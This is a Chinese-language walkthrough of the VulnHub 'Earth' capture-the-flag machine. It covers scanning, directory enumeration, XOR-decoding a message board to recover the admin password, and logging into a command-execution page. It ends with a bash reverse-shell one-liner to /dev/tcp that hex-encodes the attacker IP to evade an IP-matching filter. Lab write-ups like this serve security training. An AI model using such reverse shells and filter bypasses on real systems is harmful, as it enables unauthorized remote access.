1.安装靶机
https://download.vulnhub.com/theplanets/Earth.ova
下载靶机后安装包VirtualBox虚拟机中,将虚拟机的网络模式修改为和kali同一个模式即可,再同一个网段中
2.扫描靶机IP
在kali中使用nmap扫描我们的靶机IP,可以根据靶机网卡的MAC地址来判断,可以看到第一个就是我们的靶机IP
3.扫描端口
发现开放了80 22 443
4.访问网站
访问80端口看到报错是400,和kali的扫描结果一样
我们直接访问IP发现是Fedora Webserver Test Page页面,我们尝试使用域名来访问

5.添加host记录
可以看到这里存在DNS的解析记录,我们在hosts中添加一下
6.访问域名
可以看到是一个留言板一样的东西,我们尝试在留言板中输入一些内容
发现内容应该是经过某些格式的加密了,那我们尝试访问一下另一个域名
发现是一个测试页面,那么我们扫描一下这个域名的目录
7.目录扫描
首先扫描一下https://earth.local/
dirsearch -u https://earth.local/
发现了如下目录
再扫描一下另一个域名,扫描到了一下目录
8.访问目录
我们首先访问一下admin,发现会指引我们跳转到一个登录界面
这里我们不知到用户名和密码,所以我们先去看一下robots.txt
发现是一些后缀名,但是最后出现了一个没有后缀的文件,我们尝试拼接一下后缀看看里面有什么东西
可以看到当我们拼接txt后缀时可以看到这个文件的内容,我们拿去翻译一下,可以获得以下信息
那我们先去访问一下testdata.txt,可以看到以下的内容
翻译之后发现是一堆奇怪的地理知识
根据我们在留言板页面看到的内容,以及给我们的提示,我们不难推断出,在留言板页面的哪些信息,正是经了XOR加密的数据,那么我们利用留言板页面的内容对这一段文字进行一下XOR解密看一下有什么内容,可以看到以下内容
我们可以看到除了开头这几个字符外,后面的都是重复的内容,因此我们可以判断这就是我们的登录密码
earthclimatechangebad4humans
9.登录尝试
用我们已知的用户名和密码登录,可以看到以下界面
发现这是一个命令执行的页面
10.漏洞利用
那么我们就可以看一看网站的根目录有什么内容
可以看到有一个flag的文本,我们可以看一下,获得了一个flag
那么我们可以尝试一下反弹shell,发现禁止远程连接,那么我们只能看一下别的文件中有没有相关的内容可以绕过这个策略
通过查找我们可以看到这个文件中,有刚才禁止远程连接的信息,同时我们也可以根据这个页面的内容得到,使用了正则匹配IP的方式,那么我们可以通过这个信息来进行反弹shell
对我们的IP进行一下16进制编码,在服务器上打开监听端口,成功反弹到shell
bash -c 'exec bash -i &>/dev/tcp/0xAC105F85/6666 <&1'